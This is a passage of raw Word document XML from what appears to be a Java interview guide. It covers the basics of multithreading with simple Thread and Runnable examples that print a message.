          <w:p w14:paraId="77376B47" w14:textId="77777777" w:rsidR="00946177" w:rsidRPr="00946177" w:rsidRDefault="00946177" w:rsidP="00827C56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00946177">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Virtual threads (Final)</w:t>
            </w:r>
            <w:r w:rsidRPr="00946177">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, Pattern matching, Record patterns, String templates, Sequenced collections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="287B7183" w14:textId="7DD273BD" w:rsidR="0066065E" w:rsidRPr="0066065E" w:rsidRDefault="00000000" w:rsidP="0066065E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="22BE6918">
          <v:rect id="_x0000_i1812" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D62904" w14:textId="5AE9963B" w:rsidR="00500D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00500D6E">
      <w:pPr>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color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2C5292" w14:textId="77777777" w:rsidR="008A25EB" w:rsidRPr="00CE4B95" w:rsidRDefault="006A20C6" w:rsidP="006A20C6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="256" w:name="_Toc196307736"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Multithreading</w:t>
      </w:r>
      <w:bookmarkEnd w:id="256"/>
    </w:p>
    <w:p w14:paraId="1D5717EF" w14:textId="77777777" w:rsidR="00C836C6" w:rsidRPr="00CE4B95" w:rsidRDefault="00C836C6" w:rsidP="00C836C6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="618EBAF3" w14:textId="77777777" w:rsidR="009A5F2F" w:rsidRPr="00CE4B95" w:rsidRDefault="009A5F2F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="257" w:name="_Toc196307737"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is multithreading in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="257"/>
    </w:p>
    <w:p w14:paraId="1B2B7598" w14:textId="4F138C5B" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Multithreading</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java refers to the concurrent execution of two or more threads, allowing a program to perform multiple tasks simultaneously. A </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a lightweight process, and multithreading enables multiple threads to run in parallel, improving the efficiency and performance of applications, especially on multi-core processors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4B16F7" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Concepts of Multithreading in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BCFE42" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A thread is a small unit of a process that can run independently. Every Java application has at least one thread — the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>main thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — which is created when the program starts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117325FC" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Multithreading</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It allows a program to run multiple threads concurrently. Each thread shares the same memory space, which makes it more efficient than multiple processes (which have separate memory spaces).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0984FFB4" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Concurrency vs Parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5256FC" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1071"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refers to the ability of a program to deal with multiple tasks at once. It doesn’t mean that tasks are executed at the same time, but they are managed so that the program can execute more efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DFDD09" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1071"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a subset of concurrency where tasks are actually executed simultaneously, typically on multiple CPU cores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722F73CA" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Benefits of Multithreading:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2179FE33" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Better CPU Utilization</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Multithreading allows multiple CPU cores to be utilized, leading to better performance, especially for CPU-intensive tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6019C111" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Improved Application Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When threads run concurrently, the program can perform more work in less time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5710A182" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Faster I/O Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Multithreading can help in performing tasks like file reading/writing, network calls, etc., in parallel, reducing overall latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3410ED7E" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Responsive UI</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In GUI applications, multithreading helps keep the interface responsive by performing heavy computations or network operations in the background while the UI thread handles user interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0873B885" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How Multithreading Works in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7A6D34"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Java provides two main ways to create and manage threads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BC4826" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By Extending the Thread Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43288EA1" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1073"/>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You can create a custom thread by extending the Thread class and overriding the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F49281" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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class MyThread extends Thread {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A51471" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620DE1A8" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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public void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4996C31F" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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System.out.println("Thread is running");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C854FA" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B70D70F" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F724ED" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E508710" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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public class MultithreadingExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225A7164" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BCD77B" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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MyThread thread = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A34E78" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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thread.start();  // Starts the thread and invokes the run() method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110621B3" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33477AD0" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583F4C89" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By Implementing the Runnable Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F680ED8" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1073"/>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Alternatively, you can implement the Runnable interface and pass it to a Thread object. This is preferred over extending the Thread class, as Java supports multiple interface implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260E3D9A" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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class MyRunnable implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5DFB37" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7B1E49" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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public void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21459DEE" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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System.out.println("Runnable thread is running");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C86AE9" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BA3001" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED07B84" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F1F5909" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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public class MultithreadingExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A77F45" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CA3B1B" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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MyRunnable myRunnable = new MyRunnable();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4A47C3" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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Thread thread = new Thread(myRunnable);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AFD7B9" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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thread.start();  // Starts the thread and invokes run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F3A821" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F85BE3F" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E062EF" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lifecycle of a Thread:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434041D1"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A thread in Java goes through several states during its lifetime:</w:t>
      </w:r>
    </w:p>
